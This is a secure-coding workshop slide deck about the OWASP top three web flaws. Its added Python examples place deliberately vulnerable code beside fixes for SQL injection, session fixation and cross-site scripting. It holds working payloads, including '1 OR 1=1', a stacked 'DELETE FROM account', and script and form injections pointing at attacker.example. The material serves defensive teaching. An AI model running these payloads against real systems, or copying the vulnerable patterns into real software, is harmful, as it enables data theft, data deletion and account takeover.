2. Introduction
• Andi R Djunaedi
• Software Engineer at blibli.com since March 2014
• https://www.linkedin.com/in/andird
• https://github.com/andirdju
• https://github.com/bliblidotcom
3. Overview – understand the problem
• Theory
• Code
• Web application -> the focus of this talk
• Operating System
• Network
• Other?
• Importance
• Practice - get your laptop or PC
• How it works
4. Theory - Code
• Web Applications
• OWASP Top 10 list - revised roughly every three years
• https://www.owasp.org/index.php/Top_10_2013-Top_10
• https://www.owasp.org/index.php/Top_10_2010-Main
• Top 3 of the 2013 list (A1 Injection, A2 Broken Authentication and Session Management, A3 Cross-Site Scripting) - one sample each
• SQL Injection (A1)
• Arbitrary SQL query execution against the application's database
• Session Fixation (A2)
• Assume another user's identity
• Cross-Site Scripting (A3)
• Arbitrary client-side code (JavaScript, HTML) runs in the victim's browser
5. Importance – Non Security
• Performance
• poor user experience
• redesign, refactor, make it faster
• Code coverage
• low coverage means buggy code and more time spent fixing bugs
• stop the leak
• When
• next iteration
6. Importance – Security
• How do you fix a security incident after the fact?
• Personal/Financial data stolen
• Data deleted
• When
• NOW !!!
7. Practice – Understand the problem
• Run bad web app
• OWASP Top 3 Sample
• SQL Injection
• Session Fixation
• Cross Site Scripting
• Exercise
8. Run – web app
• Git, JDK 8, Maven
• https://github.com/bliblidotcom/sample-basic-secure-coding
• In memory H2 database
• Embedded server
• mvn spring-boot:run
• http://localhost:8080
9. Get your laptop – SQL Injection
• Demo – the valid use case is to find one record by id; with the id concatenated into the query an attacker can
• Read all records
• Insert new records
• Delete all records
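Added example (not code from the sample-basic-secure-coding repo): the workshop app is Java/Spring Boot on H2, but the same bug and the same fix are reproduced here in Python over the standard-library sqlite3 module so it runs stand-alone. The `account` table, its sample rows and the function names are constructed for this example. The read-all payload works through `execute()`; the insert and delete-all payloads need a driver that runs `;`-separated statements (H2 over JDBC does, sqlite3's `execute()` refuses), so those go through `executescript()` to emulate the page's demo.

```python
import sqlite3

# Constructed sample rows standing in for the page's in-memory H2 data.
SEED = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]


def open_db() -> sqlite3.Connection:
    """In-memory database with one table, mirroring the workshop's H2 setup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO account VALUES (?, ?, ?)", SEED)
    conn.commit()
    return conn


def find_by_id_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """Intended use: one record by id. The id is pasted into the SQL text,
    so whatever the caller sends becomes part of the query."""
    sql = "SELECT id, name, email FROM account WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def find_by_id_vulnerable_stacked(conn: sqlite3.Connection, raw_id: str) -> int:
    """Same concatenation, run by a driver that executes ';'-separated statements.
    sqlite3.execute() refuses stacked statements, so executescript() is used to
    emulate the H2/JDBC behaviour the page's insert and delete-all demos rely on.
    Returns the row count afterwards so the damage is visible."""
    sql = "SELECT id, name, email FROM account WHERE id = " + raw_id
    conn.executescript(sql)
    return conn.execute("SELECT COUNT(*) FROM account").fetchone()[0]


def find_by_id_fixed(conn: sqlite3.Connection, raw_id: str) -> list:
    """Named parameter: the SQL text is fixed and the value travels separately,
    so it can only ever be compared, never parsed as SQL."""
    try:
        account_id = int(raw_id)  # the only valid input is an integer id
    except ValueError:
        raise ValueError("id must be an integer") from None
    sql = "SELECT id, name, email FROM account WHERE id = :id"
    return conn.execute(sql, {"id": account_id}).fetchall()


if __name__ == "__main__":
    db = open_db()
    print(find_by_id_vulnerable(db, "1"))           # the intended use: one row
    print(find_by_id_vulnerable(db, "1 OR 1=1"))    # read all records
    print(find_by_id_vulnerable_stacked(
        db, "1; INSERT INTO account VALUES (4, 'mallory', 'mallory@example.com')"))
    print(find_by_id_vulnerable_stacked(db, "1; DELETE FROM account"))  # 0 rows left
    print(find_by_id_fixed(open_db(), "1"))
```

The Spring equivalent of `find_by_id_fixed` is a `NamedParameterJdbcTemplate` query with `:id` bound from a parameter source; the point is the same in any stack: the value never becomes SQL text, and rejecting non-integer ids up front removes the "1 OR 1=1" class of input before the database sees it.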
10. Get your laptop – Session Fixation
• Demo - the session id should be known only to its user
• Attacker (A) creates a new session
• A persuades an unsuspecting user (B), e.g. via a phishing link, to use that session id
• B logs in; because the id is not regenerated at login, A now holds B's authenticated session
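Added example (not from the workshop repo) of the exchange described above, written in Python against a toy in-memory session table so the two login implementations can be compared side by side. `SessionStore`, its method names and the user name are constructed for this example; the fixed login does what the page's "regenerate session id" advice asks for (Spring Security applies the same protection on login by default, and Servlet 3.1 exposes it as `request.changeSessionId()`).

```python
import secrets


class SessionStore:
    """Minimal server-side session table: session id -> attributes.
    An id that is not in the table is not a session at all."""

    def __init__(self):
        self._sessions = {}

    def create(self) -> str:
        """Anyone can obtain a fresh session id, e.g. by visiting the login page."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def who_is(self, sid: str):
        """User bound to a session id, or None if the id is unknown or not logged in."""
        return self._sessions.get(sid, {}).get("user")

    def login_vulnerable(self, sid: str, user: str) -> str:
        """Bug: authentication is attached to whatever session id the request carried.
        If an attacker planted that id, the attacker now holds the victim's login."""
        if sid not in self._sessions:
            raise KeyError("unknown session")
        self._sessions[sid]["user"] = user
        return sid

    def login_fixed(self, sid: str, user: str) -> str:
        """Fix: on successful login, discard the pre-login id and issue a new one."""
        if sid not in self._sessions:
            raise KeyError("unknown session")
        del self._sessions[sid]  # the planted id dies here
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": user}
        return new_sid


def fixation_attack(login_name: str) -> tuple:
    """Replay the page's demo against one login implementation.
    Returns (user the attacker's id resolves to, user the victim's id resolves to)."""
    store = SessionStore()
    login = getattr(store, login_name)
    planted = store.create()  # A: obtain a session id
    # A persuades B (phishing link carrying the id, or a planted cookie) to use it;
    # B then logs in while presenting that id.
    victims_sid = login(planted, "bob")
    return store.who_is(planted), store.who_is(victims_sid)


if __name__ == "__main__":
    print("vulnerable:", fixation_attack("login_vulnerable"))  # ('bob', 'bob')
    print("fixed:     ", fixation_attack("login_fixed"))       # (None, 'bob')
```

The check that matters is the first element of the tuple: with the vulnerable login the id the attacker handed out resolves to the victim's account; with the fixed login it resolves to nothing, because the only id that carries B's authentication was minted after B proved who they were.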
11. Get your laptop – Cross Site Scripting
• Demo – the valid use case only displays a list of data
• The payload can be stored through the same SQL injection (stored XSS)
• Html
• Add html form
• Javascript
• Add pop up
• Add redirect
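Added example (not from the workshop repo) of the three payloads above landing on a list page, in Python so it runs stand-alone; the workshop app renders its list from Java. The rows, the attacker host name and the function names are constructed for this example. Two renderers are shown: one that concatenates stored values into the page, and one that applies the page's "content escaping" fix at output time.

```python
import html

# Constructed rows as the list page would load them. The last three names are the
# payloads an attacker could have stored through the SQL injection on the earlier slide.
ROWS = [
    (1, "alice"),
    (2, "<form action='https://attacker.example/steal'>Password: <input name=p></form>"),
    (3, "<script>alert('pwned')</script>"),
    (4, "<script>location='https://attacker.example/'</script>"),
]


def render_list_vulnerable(rows) -> str:
    """Concatenates stored text straight into the page: stored markup becomes live markup,
    so the form is rendered, the pop-up fires and the redirect sends the user away."""
    items = "".join(f"<li>{row_id}: {name}</li>" for row_id, name in rows)
    return f"<ul>{items}</ul>"


def render_list_fixed(rows) -> str:
    """Escapes every value at output time (what Thymeleaf's th:text or JSTL's c:out do);
    the browser shows the payload as text instead of executing it."""
    items = "".join(
        f"<li>{row_id}: {html.escape(str(name), quote=True)}</li>" for row_id, name in rows
    )
    return f"<ul>{items}</ul>"


def contains_live_tags(page: str) -> bool:
    """Crude check for this demo only: an unescaped <script> or <form> tag in the output."""
    lowered = page.lower()
    return "<script" in lowered or "<form" in lowered


if __name__ == "__main__":
    print(render_list_vulnerable(ROWS))
    print(render_list_fixed(ROWS))
```

`quote=True` also escapes `"` and `'`, which matters as soon as a value lands inside an attribute. Escaping is context-specific: HTML-body escaping as above is not enough for a value written into a JavaScript string, a URL or a CSS block, so use the template engine's escaping for each of those contexts rather than a hand-rolled replace.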
12. What’s Next
• Crack the other API
• it has similar problems
• Fix the exploit
• Don’t repeat yourself by creating custom solutions - use what the framework already provides
• SQL named parameter
• Regenerate session id
• Content escaping